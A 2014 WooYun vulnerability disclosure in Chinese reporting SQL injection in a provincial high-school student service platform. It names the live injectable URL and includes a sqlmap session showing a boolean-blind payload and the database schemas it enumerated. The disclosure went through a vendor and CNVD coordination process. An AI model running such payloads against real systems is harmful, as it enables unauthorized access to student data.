漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-064949
漏洞标题:某省高中生服务平台存在SQL注射
相关厂商:河南省教育厅
漏洞作者: Kuuki
提交时间:2014-06-16 17:31
修复时间:2014-07-31 17:32
公开时间:2014-07-31 17:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-06-16: 细节已通知厂商并且等待厂商处理中
2014-06-21: 厂商已经确认,细节仅向厂商公开
2014-07-01: 细节向核心白帽子及相关领域专家公开
2014-07-11: 细节向普通白帽子公开
2014-07-21: 细节向实习白帽子公开
2014-07-31: 细节向公众公开
简要描述:
....
详细说明:
偶然看见朋友从这个网站查学业水平测试成绩
遂简单测试一番...
注射点
“http://218.29.79.80/senior/policy/?type=02”
漏洞证明:
C:\Users\H-Kuuki>sqlmap.py -u "http://218.29.79.80/senior/policy/?type=02" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws. Developer
s assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:11:26
[21:11:26] [INFO] resuming back-end DBMS 'oracle'
[21:11:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=02' AND 6644=6644 AND 'GflB'='GflB
---
[21:11:27] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[21:11:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[21:11:27] [INFO] fetching database (schema) names
[21:11:27] [INFO] fetching number of databases
[21:11:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[21:11:27] [INFO] retrieved:
[21:11:28] [WARNING] reflective value(s) found and filtering out
3
[21:11:33] [INFO] retrieved: SEMIS
[21:12:10] [INFO] retrieved: SYS
[21:12:34] [INFO] retrieved: SYSTEM
available databases [3]:
[*] SEMIS
[*] SYS
[*] SYSTEM
[21:13:18] [INFO] fetched data logged to text files under 'D:\sqlmap\output\218.29.79.80'
[*] shutting down at 21:13:18
修复方案:
赶紧过滤吧- -
版权声明:转载请注明来源 Kuuki@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-06-21 12:49
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发经青海分中心,由其后续联系网站管理单位处置。按信息泄露风险评分,rank 12
最新状态:
暂无